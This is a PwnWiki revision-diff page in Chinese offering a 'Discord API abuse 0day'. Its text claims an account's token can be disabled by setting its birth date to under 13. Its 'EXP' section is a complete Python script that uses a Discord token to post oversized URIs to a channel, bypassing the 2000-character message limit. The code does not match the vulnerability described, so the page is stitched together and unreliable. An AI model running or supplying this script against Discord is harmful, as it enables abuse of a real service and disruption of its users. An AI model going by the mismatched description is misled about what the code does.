Difference between revisions of "Discord API濫用0day"
From PwnWiki
(建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面) |
(→EXP:) |
||
| (7 intermediate revisions by 2 users not shown) | |||
| Line 1: | Line 1: | ||
| + | <languages /> | ||
| + | |||
{| style="margin: auto; width: 750px;" | {| style="margin: auto; width: 750px;" | ||
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | ||
| Line 8: | Line 10: | ||
<br><noinclude> | <br><noinclude> | ||
| − | + | <translate> | |
| − | ==漏洞原理:== | + | ==漏洞原理:== <!--T:1--> |
將賬戶的出生日期設置爲小於13歲以禁用Token,因爲Discord會自動禁用所有者小於13歲的賬戶。 | 將賬戶的出生日期設置爲小於13歲以禁用Token,因爲Discord會自動禁用所有者小於13歲的賬戶。 | ||
| + | <!--T:2--> | ||
請注意,已經設置DoB的賬戶不受到此漏洞影響。 | 請注意,已經設置DoB的賬戶不受到此漏洞影響。 | ||
| − | + | </translate> | |
==EXP:== | ==EXP:== | ||
Usage: | Usage: | ||
<pre> | <pre> | ||
| − | + | python example.py <token> | |
</pre> | </pre> | ||
| Line 65: | Line 68: | ||
</pre> | </pre> | ||
| − | ==作者:== | + | <translate> |
| + | |||
| + | ==作者:== <!--T:3--> | ||
原始作者未知。 | 原始作者未知。 | ||
| + | </translate> | ||
Latest revision as of 14:50, 22 March 2021
|
漏洞原理:
將賬戶的出生日期設置爲小於13歲以禁用Token,因爲Discord會自動禁用所有者小於13歲的賬戶。
請注意,已經設置DoB的賬戶不受到此漏洞影響。
EXP:
Usage:
python example.py <token>
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos
import requests
import random
import sys
class Exploit:
def __init__(self, token, channel):
self.token = token
self.channel_id = channel
self.headers = {'Authorization': token}
@property
def uri(self):
chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
return f'<a://a{chars}>'
def execute(self):
""" send magical URI """
return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})
def main():
if len(sys.argv) < 3:
print(f'Usage: py {sys.argv[0]} <token> <channel id>')
sys.exit()
token = sys.argv[1]
channel_id = sys.argv[2]
exploit = Exploit(token, channel_id)
exploit.execute()
if __name__ == '__main__':
main()
作者:
原始作者未知。
